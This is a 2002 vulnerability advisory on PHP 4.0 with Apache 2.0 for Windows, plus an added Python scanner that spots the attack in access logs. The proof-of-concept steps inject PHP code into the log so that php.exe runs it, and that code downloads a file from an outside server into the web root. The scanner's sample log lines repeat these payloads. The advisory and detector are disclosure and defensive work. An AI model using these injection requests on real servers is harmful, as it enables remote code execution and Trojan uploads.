Reported January 23, 2002, by Paul Brereton.
PHP version 4.0 using Apache Web Server 2.0 for Windows 2000 and Windows NT
A vulnerability exists in PHP 4.0 for Windows using Apache Web Server 2.0. By exploiting PHP's ability to view files residing outside the normal HTML root directory, an attacker can execute arbitrary code by inserting a malicious PHP-based command into the Apache log file.
The discoverer posted the following demonstration as proof-of-concept:
1) Create a text file on your Web Server called mytestfile.txt.
2) Write a short line of text in it.
3) Check how big the file is (in bytes).
4) Test that the file can be accessed via your browser by typing http://[YOUR_SERVER_IP]/mytestfile.txt.
5) Check that the file exists on the server by typing http://www.example.com/mytestfile.txt into your browser.
6) You now have to make 4 requests. (If the browser doesn't seem to connect, don't worry, it is. Don't press refresh in any step, otherwise this will not work. Remember to replace the brackets on the first two lines.)
7) Make the request in your browser. http://www.example.com/<?$fp=fopen("http://[YOUR_SERVER_IP]/mytestfile.txt","rb");?>
8) Wait for about 10 seconds.
9) Make the request in your browser. http://www.example.com/<?$contents=fread($fp,[REPLACE_WITH_THE_SIZE_OF_YOUR_FILE]);?>
10) Wait for about 10 seconds.
11) Make the request in your browser. http://www.example.com/<?$fq=fopen("c:/Apache2/htdocs/mytestfile.txt","wb");?>
12) Wait for about 10 seconds.
13) Make the request in your browser. http://www.example.com/<?fwrite($fq,$contents);?>
14) Wait for about 10 seconds.
15) Make a request for a non-existent file (to flush the access log) by typing http://www.example.com/nonexistantfile.htm.
16) Wait for about 10 seconds.
17) Get php.exe to parse the Apache log file by typing http://www.example.com/php/php.exe?c:\apache2\logs\access.log.
18) Press Refresh to make sure the log file has been parsed.
19) Check for the file on the server by typing http://www.example.com/mytestfile.txt.
What happens is that php.exe runs the PHP code that has been logged in the Apache log file. The code in the log file then tells the server to download the file from your server and save it into the Apache directory.
The uploaded file can be a Trojan, an .exe file, a .php file, etc. There is no limitation on what you can upload or where.
It is a very simple task to write a Trojan with CGI headers and to execute it once uploaded.
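The chain above leaves two distinct traces in the access log: request targets that carry PHP open tags (the poisoning stage) and a request that invokes the PHP CGI binary with a file path as its query string (the parsing stage). The following scanner is an added example written for this page, not code from the advisory or from the PHP or Apache projects; it parses common-log-format lines with a hypothetical parser, URL-decodes each request target so that encoded `%3C?...?%3E` forms are caught as well as raw ones, and reports hosts that produced both stages. The log lines embedded in it are constructed sample data, not real traffic.

```python
import re
from urllib.parse import unquote

# Apache common log format: host ident user [time] "request" status bytes.
# The request field may contain literal quotes escaped by Apache as \".
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Stage 1: a PHP open tag inside the request target. "<?xml" is excluded so an
# XML fragment in an ordinary query parameter does not trip the rule.
PHP_TAG_RE = re.compile(r'<\?(?!xml)', re.IGNORECASE)

# Stage 2: php or php.exe invoked with a query string that is a file path
# (Windows drive letter or an absolute path) rather than a key=value query.
PHP_CGI_PATH_RE = re.compile(r'php(?:\.exe)?\?(?:[a-z]:[\\/]|/)', re.IGNORECASE)

STAGE_TAG = "php-tag-in-request"
STAGE_CGI = "php-cgi-called-with-file-path"

# Constructed sample log lines for this example (not real traffic).
SAMPLE_LOG = [
    r'10.0.0.5 - - [23/Jan/2002:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1024',
    r'10.0.0.5 - - [23/Jan/2002:10:00:12 +0000] "GET /<?$fp=fopen(\"http://10.0.0.9/mytestfile.txt\",\"rb\");?> HTTP/1.1" 404 294',
    r'10.0.0.5 - - [23/Jan/2002:10:00:25 +0000] "GET /%3C?fwrite($fq,$contents);?%3E HTTP/1.1" 404 294',
    r'10.0.0.5 - - [23/Jan/2002:10:00:40 +0000] "GET /nonexistantfile.htm HTTP/1.1" 404 294',
    r'10.0.0.5 - - [23/Jan/2002:10:00:50 +0000] "GET /php/php.exe?c:\apache2\logs\access.log HTTP/1.1" 200 5120',
    r'10.0.0.7 - - [23/Jan/2002:10:01:03 +0000] "GET /search?q=<?xml HTTP/1.1" 200 800',
    r'10.0.0.8 - - [23/Jan/2002:10:01:09 +0000] "GET /php/php.exe?a=1 HTTP/1.1" 200 300',
]


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    fields = m.groupdict()
    # The request line is "METHOD target PROTOCOL"; keep the target only.
    parts = fields["request"].split(" ")
    target = parts[1] if len(parts) >= 2 else fields["request"]
    fields["target"] = target.replace('\\"', '"')
    return fields


def classify(target):
    """Return the list of stage labels a decoded request target matches."""
    decoded = unquote(target)
    reasons = []
    if PHP_TAG_RE.search(decoded):
        reasons.append(STAGE_TAG)
    if PHP_CGI_PATH_RE.search(decoded):
        reasons.append(STAGE_CGI)
    return reasons


def scan(lines):
    """Scan an iterable of log lines; return one finding per suspicious line."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        fields = parse_line(line.rstrip("\n"))
        if fields is None:
            continue
        reasons = classify(fields["target"])
        if reasons:
            findings.append({
                "line": lineno,
                "host": fields["host"],
                "target": fields["target"],
                "reasons": reasons,
            })
    return findings


def hosts_completing_chain(findings):
    """Hosts that both injected a PHP tag and invoked the PHP CGI on a file path."""
    seen = {}
    for f in findings:
        seen.setdefault(f["host"], set()).update(f["reasons"])
    return sorted(h for h, r in seen.items() if {STAGE_TAG, STAGE_CGI} <= r)


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f'line {f["line"]} {f["host"]} {f["reasons"]} {f["target"]}')
    print("hosts completing the chain:", hosts_completing_chain(results))
```

Run it against a real log with `scan(open("access.log"))`. A single poisoning line is noise worth recording; the same host also reaching the CGI binary with a path argument is the signal that the logged code was actually parsed. The second stage is also the one to remove: if the PHP executable is not reachable as a CGI that accepts an arbitrary file path, PHP source sitting in the access log is never executed.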
The vendor, PHP, has been notified.
Discovered by Paul Brereton.